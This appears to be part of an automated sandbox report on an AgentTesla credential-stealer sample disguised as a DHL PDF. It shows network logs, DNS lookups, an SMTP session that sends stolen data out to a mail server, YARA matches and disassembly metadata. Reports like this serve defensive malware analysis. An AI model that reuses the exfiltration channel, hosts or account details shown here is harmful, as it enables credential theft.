                                          Jul 2, 2024 17:32:05.183937073 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.184191942 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:05.189007044 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.544742107 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.546382904 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:05.551331997 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.766474009 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.766946077 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:05.771820068 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.987466097 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.987983942 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:05.988044977 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:05.988075972 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:05.988084078 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:05.992799997 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.993066072 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.993165016 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:05.993175030 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:06.754036903 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:06.797653913 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:53.719795942 CEST4970880192.168.2.5208.95.112.1
                                          Jul 2, 2024 17:32:53.725198030 CEST8049708208.95.112.1192.168.2.5
                                          Jul 2, 2024 17:32:53.725270987 CEST4970880192.168.2.5208.95.112.1
                                          Jul 2, 2024 17:33:06.754215002 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:33:06.754407883 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:33:43.735503912 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:33:43.735586882 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:33:43.740531921 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:33:43.740545034 CEST5874971094.73.188.44192.168.2.5

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 2, 2024 17:32:02.350795984 CEST6030853192.168.2.51.1.1.1
                                          Jul 2, 2024 17:32:02.358156919 CEST53603081.1.1.1192.168.2.5
                                          Jul 2, 2024 17:32:03.716209888 CEST6480353192.168.2.51.1.1.1
                                          Jul 2, 2024 17:32:03.873982906 CEST53648031.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 2, 2024 17:32:02.350795984 CEST192.168.2.51.1.1.10x5bb0Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                          Jul 2, 2024 17:32:03.716209888 CEST192.168.2.51.1.1.10x3f91Standard query (0)mail.elektronikkutu.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 2, 2024 17:32:02.358156919 CEST1.1.1.1192.168.2.50x5bb0No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                          Jul 2, 2024 17:32:03.873982906 CEST1.1.1.1192.168.2.50x3f91No error (0)mail.elektronikkutu.commx-out05.natrohost.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 2, 2024 17:32:03.873982906 CEST1.1.1.1192.168.2.50x3f91No error (0)mx-out05.natrohost.com94.73.188.44A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • ip-api.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549708208.95.112.1805660C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 2, 2024 17:32:02.377576113 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                          Host: ip-api.com
                                          Connection: Keep-Alive
                                          Jul 2, 2024 17:32:02.853199005 CEST175INHTTP/1.1 200 OK
                                          Date: Tue, 02 Jul 2024 15:32:01 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 6
                                          Access-Control-Allow-Origin: *
                                          X-Ttl: 60
                                          X-Rl: 44
                                          Data Raw: 66 61 6c 73 65 0a
                                          Data Ascii: false


                                          SMTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Jul 2, 2024 17:32:04.511312962 CEST5874971094.73.188.44192.168.2.5220 vsp-in13.natrohost.com ESMTP
                                          Jul 2, 2024 17:32:04.511496067 CEST49710587192.168.2.594.73.188.44EHLO 849224
                                          Jul 2, 2024 17:32:04.732882977 CEST5874971094.73.188.44192.168.2.5250-vsp-in13.natrohost.com
                                          250-PIPELINING
                                          250-SIZE 52428800
                                          250-STARTTLS
                                          250-AUTH LOGIN PLAIN
                                          250-ENHANCEDSTATUSCODES
                                          250 8BITMIME
                                          Jul 2, 2024 17:32:04.733956099 CEST49710587192.168.2.594.73.188.44AUTH login aW5mb0BlbGVrdHJvbmlra3V0dS5jb20=
                                          Jul 2, 2024 17:32:04.953203917 CEST5874971094.73.188.44192.168.2.5334 UGFzc3dvcmQ6
                                          Jul 2, 2024 17:32:05.183937073 CEST5874971094.73.188.44192.168.2.5235 2.7.0 Ok
                                          Jul 2, 2024 17:32:05.184191942 CEST49710587192.168.2.594.73.188.44MAIL FROM:<info@elektronikkutu.com>
                                          Jul 2, 2024 17:32:05.544742107 CEST5874971094.73.188.44192.168.2.5250 2.1.0 Ok
                                          Jul 2, 2024 17:32:05.546382904 CEST49710587192.168.2.594.73.188.44RCPT TO:<smt.treat@yandex.com>
                                          Jul 2, 2024 17:32:05.766474009 CEST5874971094.73.188.44192.168.2.5250 2.1.5 Ok
                                          Jul 2, 2024 17:32:05.766946077 CEST49710587192.168.2.594.73.188.44DATA
                                          Jul 2, 2024 17:32:05.987466097 CEST5874971094.73.188.44192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                          Jul 2, 2024 17:32:05.988084078 CEST49710587192.168.2.594.73.188.44.
                                          Jul 2, 2024 17:32:06.754036903 CEST5874971094.73.188.44192.168.2.5250 2.0.0 Ok: queued as 3bee0651-3888-11ef-bf4f-6f88f3e6c78f
                                          Jul 2, 2024 17:33:43.735503912 CEST49710587192.168.2.594.73.188.44QUIT

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:11:31:58
                                          Start date:02/07/2024
                                          Path:C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe"
                                          Imagebase:0xa60000
                                          File size:1'013'256 bytes
                                          MD5 hash:E31DA8DF37174250F302C4640F97BA15
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:11:32:01
                                          Start date:02/07/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xe30000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4515977938.000000000317E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:11.3%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:81
                                            Total number of Limit Nodes:2
                                            execution_graph 35779 2d3d040 35780 2d3d086 35779->35780 35784 2d3d618 35780->35784 35787 2d3d628 35780->35787 35781 2d3d173 35790 2d3d27c 35784->35790 35788 2d3d656 35787->35788 35789 2d3d27c DuplicateHandle 35787->35789 35788->35781 35789->35788 35791 2d3d690 DuplicateHandle 35790->35791 35792 2d3d656 35791->35792 35792->35781 35831 2d3acb0 35835 2d3ad97 35831->35835 35843 2d3ada8 35831->35843 35832 2d3acbf 35836 2d3adb9 35835->35836 35837 2d3addc 35835->35837 35836->35837 35851 2d3b040 35836->35851 35855 2d3b030 35836->35855 35837->35832 35838 2d3add4 35838->35837 35839 2d3afe0 GetModuleHandleW 35838->35839 35840 2d3b00d 35839->35840 35840->35832 35844 2d3adb9 35843->35844 35845 2d3addc 35843->35845 35844->35845 35849 2d3b040 LoadLibraryExW 35844->35849 35850 2d3b030 LoadLibraryExW 35844->35850 35845->35832 35846 2d3add4 35846->35845 35847 2d3afe0 GetModuleHandleW 35846->35847 35848 2d3b00d 35847->35848 35848->35832 35849->35846 35850->35846 35852 2d3b054 35851->35852 35854 2d3b079 35852->35854 35859 2d3a130 35852->35859 35854->35838 35856 2d3b054 35855->35856 35857 2d3a130 LoadLibraryExW 35856->35857 35858 2d3b079 35856->35858 35857->35858 35858->35838 35860 2d3b220 LoadLibraryExW 35859->35860 35862 2d3b299 35860->35862 35862->35854 35793 145d01c 35794 145d034 35793->35794 35795 145d08e 35794->35795 35798 53e2818 35794->35798 35803 53e2809 35794->35803 35799 53e2845 35798->35799 35800 53e2877 35799->35800 35808 53e29a0 35799->35808 35812 53e2990 35799->35812 35804 53e2845 35803->35804 35805 53e2877 35804->35805 35806 53e29a0 2 API calls 35804->35806 35807 53e2990 2 API calls 35804->35807 35806->35805 35807->35805 35809 53e29b4 35808->35809 35816 53e2a58 35809->35816 35810 53e2a40 35810->35800 35814 53e29b4 35812->35814 35813 53e2a40 35813->35800 35815 53e2a58 2 API calls 35814->35815 35815->35813 35817 53e2a69 35816->35817 35819 53e4012 35816->35819 35817->35810 35823 53e4030 35819->35823 35827 53e4040 35819->35827 35820 53e402a 35820->35817 35824 53e4040 35823->35824 35825 53e40da CallWindowProcW 35824->35825 35826 53e4089 35824->35826 35825->35826 35826->35820 35828 53e4082 35827->35828 35830 53e4089 35827->35830 35829 53e40da CallWindowProcW 35828->35829 35828->35830 35829->35830 35830->35820 35863 2d34668 35864 2d3467a 35863->35864 35865 2d34686 35864->35865 35867 2d34779 35864->35867 35868 2d3479d 35867->35868 35872 2d34888 35868->35872 35876 2d34878 35868->35876 35873 2d348af 35872->35873 35875 2d3498c 35873->35875 35880 2d344b0 35873->35880 35878 2d34888 35876->35878 35877 2d3498c 35878->35877 35879 2d344b0 CreateActCtxA 35878->35879 35879->35877 35881 2d35918 CreateActCtxA 35880->35881 35883 2d359db 35881->35883

                                            Executed Functions

                                            Function 053E6BF0 Relevance: .8, Instructions: 777COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f59202a341b93f8f9c3ed5ebbb73d3fda3560632ac755fa3330d06febc9ecfe
                                            • Instruction ID: a5bba52ba0d0b2ff8796017e218440acfb13191961b76dda6c46faa4ac5793e5
                                            • Opcode Fuzzy Hash: 6f59202a341b93f8f9c3ed5ebbb73d3fda3560632ac755fa3330d06febc9ecfe
                                            • Instruction Fuzzy Hash: 7782E534A10229CFDB14EF68D895B99B7B2FF8A300F5185E9D4496B360DB30AE85CF51
                                            Function 053E6C00 Relevance: .8, Instructions: 772COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58ef1f07c5ec957ecf8f8b4d5af59a7b062888c9f5111623ab5194df42a97bc9
                                            • Instruction ID: 97c0c7d5c5199623cbadae809f6e240e441784371a96f60caca38f6d8bdd6a66
                                            • Opcode Fuzzy Hash: 58ef1f07c5ec957ecf8f8b4d5af59a7b062888c9f5111623ab5194df42a97bc9
                                            • Instruction Fuzzy Hash: B382E434A10229CFDB14EF68D895B99B7B2FF8A300F5185E9D4496B360DB30AE85CF51
                                            Function 02D3ADA8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 405 2d3ada8-2d3adb7 406 2d3ade3-2d3ade7 405->406 407 2d3adb9-2d3adc6 call 2d3a0cc 405->407 408 2d3adfb-2d3ae3c 406->408 409 2d3ade9-2d3adf3 406->409 412 2d3adc8 407->412 413 2d3addc 407->413 416 2d3ae49-2d3ae57 408->416 417 2d3ae3e-2d3ae46 408->417 409->408 460 2d3adce call 2d3b040 412->460 461 2d3adce call 2d3b030 412->461 413->406 419 2d3ae7b-2d3ae7d 416->419 420 2d3ae59-2d3ae5e 416->420 417->416 418 2d3add4-2d3add6 418->413 424 2d3af18-2d3afd8 418->424 423 2d3ae80-2d3ae87 419->423 421 2d3ae60-2d3ae67 call 2d3a0d8 420->421 422 2d3ae69 420->422 428 2d3ae6b-2d3ae79 421->428 422->428 426 2d3ae94-2d3ae9b 423->426 427 2d3ae89-2d3ae91 423->427 455 2d3afe0-2d3b00b GetModuleHandleW 424->455 456 2d3afda-2d3afdd 424->456 431 2d3aea8-2d3aeaa call 2d3a0e8 426->431 432 2d3ae9d-2d3aea5 426->432 427->426 428->423 435 2d3aeaf-2d3aeb1 431->435 432->431 436 2d3aeb3-2d3aebb 435->436 437 2d3aebe-2d3aec3 435->437 436->437 439 2d3aee1-2d3aeee 437->439 440 2d3aec5-2d3aecc 437->440 446 2d3af11-2d3af17 439->446 447 2d3aef0-2d3af0e 439->447 440->439 441 2d3aece-2d3aede call 2d3a0f8 call 2d3a108 440->441 441->439 447->446 457 2d3b014-2d3b028 455->457 458 2d3b00d-2d3b013 455->458 456->455 458->457 460->418 461->418
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02D3AFFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: d0f89b8d4a83c0846bccd29910a956790bcf230c5f7c88a10e9d2644bbc38f94
                                            • Instruction ID: fde69d2a6e361c1e4709cae58533bb5265fd57d149ec4f4ed67c1c3a4eac2198
                                            • Opcode Fuzzy Hash: d0f89b8d4a83c0846bccd29910a956790bcf230c5f7c88a10e9d2644bbc38f94
                                            • Instruction Fuzzy Hash: D97112B0A00B058FD725DF29D44475ABBF1FF88604F108A2ED48AE7B50E775E845CB90
                                            Function 05A2E8D8 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 462 5a2e8d8-5a2e8ef 463 5a2e8f1-5a2e8f6 462->463 464 5a2e8f8-5a2e8fe 462->464 465 5a2e901-5a2e905 463->465 464->465 466 5a2e907-5a2e90c 465->466 467 5a2e90e-5a2e914 465->467 468 5a2e917-5a2e91b 466->468 467->468 469 5a2e93f-5a2e943 468->469 470 5a2e91d-5a2e93a 468->470 471 5a2e967-5a2e972 469->471 472 5a2e945-5a2e962 469->472 481 5a2eb5f-5a2eb68 470->481 474 5a2e974-5a2e977 471->474 475 5a2e97a-5a2e980 471->475 472->481 474->475 476 5a2e986-5a2e996 475->476 477 5a2eb6b-5a2ee0e 475->477 484 5a2e9bb-5a2e9e0 476->484 485 5a2e998-5a2e9b6 476->485 492 5a2e9e6-5a2e9ef 484->492 493 5a2eb28-5a2eb2d 484->493 489 5a2eb1f-5a2eb22 485->489 489->492 489->493 492->477 496 5a2e9f5-5a2ea0d 492->496 493->477 495 5a2eb2f-5a2eb32 493->495 498 5a2eb36-5a2eb39 495->498 499 5a2eb34 495->499 503 5a2ea1f-5a2ea36 496->503 504 5a2ea0f-5a2ea14 496->504 498->477 500 5a2eb3b-5a2eb5d 498->500 499->481 500->481 512 5a2ea38 503->512 513 5a2ea3e-5a2ea48 503->513 504->477 506 5a2ea1a-5a2ea1d 504->506 506->503 508 5a2ea4d-5a2ea52 506->508 508->477 514 5a2ea58-5a2ea67 508->514 512->513 513->493 519 5a2ea69 514->519 520 5a2ea6f-5a2ea7f 514->520 519->520 520->477 523 5a2ea85-5a2ea88 520->523 523->477 525 5a2ea8e-5a2ea91 523->525 526 5a2eae2-5a2eaf4 525->526 527 5a2ea93-5a2ea97 525->527 526->489 534 5a2eaf6-5a2eb0b 526->534 527->477 529 5a2ea9d-5a2eaa3 527->529 532 5a2eab4-5a2eaba 529->532 533 5a2eaa5-5a2eaab 529->533 532->477 536 5a2eac0-5a2eacc 532->536 533->477 535 5a2eab1 533->535 541 5a2eb13-5a2eb1d 534->541 542 5a2eb0d 534->542 535->532 543 5a2ead4-5a2eae0 536->543 541->493 542->541 543->526
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q
                                            • API String ID: 0-1259897404
                                            • Opcode ID: b6d15bff1fa66af1c999470ac7f0a45d29562bb5e0f3c1e948502db8bd34034d
                                            • Instruction ID: a48c83cba9bca4c6bc5858516b2cfa40e02701141c9e6fab29e8257a5fee6e88
                                            • Opcode Fuzzy Hash: b6d15bff1fa66af1c999470ac7f0a45d29562bb5e0f3c1e948502db8bd34034d
                                            • Instruction Fuzzy Hash: 85E19174B0021ADFDB05EFACD494AAEBBB7FB88300F118059E505A7365DB34AD85CB51
                                            Function 02D344B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 570 2d344b0-2d359d9 CreateActCtxA 573 2d359e2-2d35a3c 570->573 574 2d359db-2d359e1 570->574 581 2d35a4b-2d35a4f 573->581 582 2d35a3e-2d35a41 573->582 574->573 583 2d35a51-2d35a5d 581->583 584 2d35a60-2d35a90 581->584 582->581 583->584 588 2d35a42-2d35a4a 584->588 589 2d35a92-2d35b14 584->589 588->581
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02D359C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 8977474da1819743fca7a65c621c3e7f3f901e48e8704512cd900bbfa703b3b3
                                            • Instruction ID: d13e4c6faf21e24687c692e6a46b3ee992123b37e8747c970677114e1e373395
                                            • Opcode Fuzzy Hash: 8977474da1819743fca7a65c621c3e7f3f901e48e8704512cd900bbfa703b3b3
                                            • Instruction Fuzzy Hash: AC41DFB0C0061DCBDB25CFA9C884BDEBBB5BF49304F60806AD408AB255DB756949CFA1
                                            Function 02D3590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 591 2d3590d-2d35913 592 2d35918-2d359d9 CreateActCtxA 591->592 594 2d359e2-2d35a3c 592->594 595 2d359db-2d359e1 592->595 602 2d35a4b-2d35a4f 594->602 603 2d35a3e-2d35a41 594->603 595->594 604 2d35a51-2d35a5d 602->604 605 2d35a60-2d35a90 602->605 603->602 604->605 609 2d35a42-2d35a4a 605->609 610 2d35a92-2d35b14 605->610 609->602
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02D359C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 9ba491447d37ce8198297771a76e603ba594026d36782232df612ad891d2728c
                                            • Instruction ID: 4bd6a31e1b24e998dd516634196775b0dc25d8ca3417861fbbc200234376ccb5
                                            • Opcode Fuzzy Hash: 9ba491447d37ce8198297771a76e603ba594026d36782232df612ad891d2728c
                                            • Instruction Fuzzy Hash: C441DFB1C00619CBDB25CFA9C884BCEBBB5BF49304F60806AD408AB255DB71694ACF91
                                            Function 053E4040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 612 53e4040-53e407c 613 53e412c-53e414c 612->613 614 53e4082-53e4087 612->614 620 53e414f-53e415c 613->620 615 53e40da-53e4112 CallWindowProcW 614->615 616 53e4089-53e40c0 614->616 618 53e411b-53e412a 615->618 619 53e4114-53e411a 615->619 622 53e40c9-53e40d8 616->622 623 53e40c2-53e40c8 616->623 618->620 619->618 622->620 623->622
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 053E4101
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 0c49132df491521199b001de71dea23697a300926216dacc2956d6c3b41460b7
                                            • Instruction ID: 22954527deb00e2d9c9b2016fc0a985b2ae87e80a680c473c7ce516707b9890e
                                            • Opcode Fuzzy Hash: 0c49132df491521199b001de71dea23697a300926216dacc2956d6c3b41460b7
                                            • Instruction Fuzzy Hash: 2341F5B8900359CFCB14CF99C888AAAFBF5FB88314F25C459D519AB361D775A841CFA0
                                            Function 02D3D751 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 626 2d3d751-2d3d758 627 2d3d714-2d3d724 DuplicateHandle 626->627 628 2d3d75a-2d3d87e 626->628 629 2d3d726-2d3d72c 627->629 630 2d3d72d-2d3d74a 627->630 629->630
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D656,?,?,?,?,?), ref: 02D3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 74f400410f8af67a4ae87ebeae4df59ca223464b574aa4c987df11e7baeef36f
                                            • Instruction ID: 4ef1f4f10c4a9cfb5f62c122d3ed5b7be119442acfdc274798884b0e8e1ba380
                                            • Opcode Fuzzy Hash: 74f400410f8af67a4ae87ebeae4df59ca223464b574aa4c987df11e7baeef36f
                                            • Instruction Fuzzy Hash: A231C174A80381DFEB449F64E4597793BAAFB84315F528435F9218F7C8CAB00895CF20
                                            Function 02D3D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 644 2d3d27c-2d3d724 DuplicateHandle 646 2d3d726-2d3d72c 644->646 647 2d3d72d-2d3d74a 644->647 646->647
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D656,?,?,?,?,?), ref: 02D3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 25ca100e2e4ffe1dbc10bbfe203341c31828750b4e971ca229d3279d13ea2ce0
                                            • Instruction ID: 090836c0167286f9edd015fcf51887f609e69bb71ec93007bd08b9a01faa35d5
                                            • Opcode Fuzzy Hash: 25ca100e2e4ffe1dbc10bbfe203341c31828750b4e971ca229d3279d13ea2ce0
                                            • Instruction Fuzzy Hash: A82103B5D002489FDB10CF9AD884ADEFBF9EB48310F10805AE919A3310D374A950CFA5
                                            Function 02D3D689 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 650 2d3d689-2d3d724 DuplicateHandle 651 2d3d726-2d3d72c 650->651 652 2d3d72d-2d3d74a 650->652 651->652
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D656,?,?,?,?,?), ref: 02D3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 237d4800a00b3d89dcd28d3a0ffec1cb950dfaf95a2e15eee724788b84763660
                                            • Instruction ID: f502cfe00622c84293b789eb2bac3082d5a60dfe5c3d4f82be9521c3c0d01aab
                                            • Opcode Fuzzy Hash: 237d4800a00b3d89dcd28d3a0ffec1cb950dfaf95a2e15eee724788b84763660
                                            • Instruction Fuzzy Hash: FF2112B5D002499FDB10CFA9D584ADEFBF5EB48314F14805AE818A3310C338A954CF61
                                            Function 02D3A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 655 2d3a130-2d3b260 657 2d3b262-2d3b265 655->657 658 2d3b268-2d3b297 LoadLibraryExW 655->658 657->658 659 2d3b2a0-2d3b2bd 658->659 660 2d3b299-2d3b29f 658->660 660->659
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02D3B079,00000800,00000000,00000000), ref: 02D3B28A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
